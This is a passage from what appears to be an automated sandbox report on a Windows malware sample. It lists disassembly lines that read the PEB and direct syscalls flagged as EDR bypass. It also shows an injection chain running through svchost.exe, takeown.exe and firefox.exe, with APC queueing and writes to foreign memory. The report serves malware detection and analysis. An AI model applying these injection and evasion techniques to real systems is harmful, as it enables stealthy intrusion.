                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]2_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]2_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]2_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]2_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EBFC mov eax, dword ptr fs:[00000030h]2_2_0315EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BCBF0 mov eax, dword ptr fs:[00000030h]2_2_031BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BCA11 mov eax, dword ptr fs:[00000030h]2_2_031BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03154A35 mov eax, dword ptr fs:[00000030h]2_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03154A35 mov eax, dword ptr fs:[00000030h]2_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA38 mov eax, dword ptr fs:[00000030h]2_2_0316CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA24 mov eax, dword ptr fs:[00000030h]2_2_0316CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EA2E mov eax, dword ptr fs:[00000030h]2_2_0315EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140A5B mov eax, dword ptr fs:[00000030h]2_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140A5B mov eax, dword ptr fs:[00000030h]2_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031ACA72 mov eax, dword ptr fs:[00000030h]2_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031ACA72 mov eax, dword ptr fs:[00000030h]2_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]2_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]2_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]2_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DEA60 mov eax, dword ptr fs:[00000030h]2_2_031DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168A90 mov edx, dword ptr fs:[00000030h]2_2_03168A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204A80 mov eax, dword ptr fs:[00000030h]2_2_03204A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138AA0 mov eax, dword ptr fs:[00000030h]2_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138AA0 mov eax, dword ptr fs:[00000030h]2_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186AA4 mov eax, dword ptr fs:[00000030h]2_2_03186AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130AD0 mov eax, dword ptr fs:[00000030h]2_2_03130AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03164AD0 mov eax, dword ptr fs:[00000030h]2_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03164AD0 mov eax, dword ptr fs:[00000030h]2_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]2_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]2_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]2_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316AAEE mov eax, dword ptr fs:[00000030h]2_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316AAEE mov eax, dword ptr fs:[00000030h]2_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC912 mov eax, dword ptr fs:[00000030h]2_2_031BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128918 mov eax, dword ptr fs:[00000030h]2_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128918 mov eax, dword ptr fs:[00000030h]2_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE908 mov eax, dword ptr fs:[00000030h]2_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE908 mov eax, dword ptr fs:[00000030h]2_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B892A mov eax, dword ptr fs:[00000030h]2_2_031B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C892B mov eax, dword ptr fs:[00000030h]2_2_031C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0946 mov eax, dword ptr fs:[00000030h]2_2_031B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4978 mov eax, dword ptr fs:[00000030h]2_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4978 mov eax, dword ptr fs:[00000030h]2_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC97C mov eax, dword ptr fs:[00000030h]2_2_031BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]2_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]2_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]2_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E mov eax, dword ptr fs:[00000030h]2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E mov edx, dword ptr fs:[00000030h]2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E mov eax, dword ptr fs:[00000030h]2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B89B3 mov esi, dword ptr fs:[00000030h]2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B89B3 mov eax, dword ptr fs:[00000030h]2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B89B3 mov eax, dword ptr fs:[00000030h]2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031309AD mov eax, dword ptr fs:[00000030h]2_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031309AD mov eax, dword ptr fs:[00000030h]2_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031649D0 mov eax, dword ptr fs:[00000030h]2_2_031649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA9D3 mov eax, dword ptr fs:[00000030h]2_2_031FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C69C0 mov eax, dword ptr fs:[00000030h]2_2_031C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031629F9 mov eax, dword ptr fs:[00000030h]2_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031629F9 mov eax, dword ptr fs:[00000030h]2_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE9E0 mov eax, dword ptr fs:[00000030h]2_2_031BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC810 mov eax, dword ptr fs:[00000030h]2_2_031BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov ecx, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A830 mov eax, dword ptr fs:[00000030h]2_2_0316A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D483A mov eax, dword ptr fs:[00000030h]2_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D483A mov eax, dword ptr fs:[00000030h]2_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160854 mov eax, dword ptr fs:[00000030h]2_2_03160854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134859 mov eax, dword ptr fs:[00000030h]2_2_03134859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134859 mov eax, dword ptr fs:[00000030h]2_2_03134859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE872 mov eax, dword ptr fs:[00000030h]2_2_031BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE872 mov eax, dword ptr fs:[00000030h]2_2_031BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6870 mov eax, dword ptr fs:[00000030h]2_2_031C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6870 mov eax, dword ptr fs:[00000030h]2_2_031C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC89D mov eax, dword ptr fs:[00000030h]2_2_031BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130887 mov eax, dword ptr fs:[00000030h]2_2_03130887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E8C0 mov eax, dword ptr fs:[00000030h]2_2_0315E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C8F9 mov eax, dword ptr fs:[00000030h]2_2_0316C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C8F9 mov eax, dword ptr fs:[00000030h]2_2_0316C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA8E4 mov eax, dword ptr fs:[00000030h]2_2_031FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132F12 mov eax, dword ptr fs:[00000030h]2_2_03132F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CF1F mov eax, dword ptr fs:[00000030h]2_2_0316CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E6F00 mov eax, dword ptr fs:[00000030h]2_2_031E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EF28 mov eax, dword ptr fs:[00000030h]2_2_0315EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CF50 mov eax, dword ptr fs:[00000030h]2_2_0312CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CF50 mov eax, dword ptr fs:[00000030h]2_2_0312CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CF50 mov eax, dword ptr fs:[00000030h]2_2_0312CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CF50 mov eax, dword ptr fs:[00000030h]2_2_0312CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CF50 mov eax, dword ptr fs:[00000030h]2_2_0312CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CF50 mov eax, dword ptr fs:[00000030h]2_2_0312CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CF50 mov eax, dword ptr fs:[00000030h]2_2_0316CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204F68 mov eax, dword ptr fs:[00000030h]2_2_03204F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D0F50 mov eax, dword ptr fs:[00000030h]2_2_031D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4F40 mov eax, dword ptr fs:[00000030h]2_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4F40 mov eax, dword ptr fs:[00000030h]2_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4F40 mov eax, dword ptr fs:[00000030h]2_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4F40 mov eax, dword ptr fs:[00000030h]2_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4F42 mov eax, dword ptr fs:[00000030h]2_2_031D4F42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315AF69 mov eax, dword ptr fs:[00000030h]2_2_0315AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315AF69 mov eax, dword ptr fs:[00000030h]2_2_0315AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2F60 mov eax, dword ptr fs:[00000030h]2_2_031D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2F60 mov eax, dword ptr fs:[00000030h]2_2_031D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03162F98 mov eax, dword ptr fs:[00000030h]2_2_03162F98
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00FE80A9
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FBA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FBA155
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FBA124 SetUnhandledExceptionFilter,0_2_00FBA124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtAllocateVirtualMemory: Direct from: 0x77172BFCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtDelayExecution: Direct from: 0x77172DDCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtQuerySystemInformation: Direct from: 0x77172DFCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtReadFile: Direct from: 0x77172ADCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtQueryInformationProcess: Direct from: 0x77172C26Jump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtResumeThread: Direct from: 0x77172FBCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtWriteVirtualMemory: Direct from: 0x7717490CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtCreateUserProcess: Direct from: 0x7717371CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtOpenKeyEx: Direct from: 0x77172B9CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtNotifyChangeKey: Direct from: 0x77173C2CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtSetInformationProcess: Direct from: 0x77172C5CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtProtectVirtualMemory: Direct from: 0x77172F9CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtResumeThread: Direct from: 0x771736ACJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtMapViewOfSection: Direct from: 0x77172D1CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtWriteVirtualMemory: Direct from: 0x77172E3CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtCreateMutant: Direct from: 0x771735CCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtDeviceIoControlFile: Direct from: 0x77172AECJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtAllocateVirtualMemory: Direct from: 0x77172BECJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtTerminateThread: Direct from: 0x77172FCCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtQueryInformationToken: Direct from: 0x77172CACJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtCreateFile: Direct from: 0x77172FECJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtOpenFile: Direct from: 0x77172DCCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtClose: Direct from: 0x77172B6C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtSetInformationThread: Direct from: 0x771663F9Jump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtAllocateVirtualMemory: Direct from: 0x77173C9CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtQueryAttributesFile: Direct from: 0x77172E6CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtSetInformationThread: Direct from: 0x77172B4CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtReadVirtualMemory: Direct from: 0x77172E8CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtCreateKey: Direct from: 0x77172C6CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtQueryVolumeInformationFile: Direct from: 0x77172F2CJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtAllocateVirtualMemory: Direct from: 0x771748ECJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtQuerySystemInformation: Direct from: 0x771748CCJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeNtOpenSection: Direct from: 0x77172E0CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\takeown.exeThread register set: target process: 7396Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\takeown.exeThread APC queued: target process: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 275A008Jump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE87B1 LogonUserW,0_2_00FE87B1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F93B3A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F948D7
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF4C7F mouse_event,0_2_00FF4C7F
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\arGdXDmyGJ.exe"Jump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FE7CAF
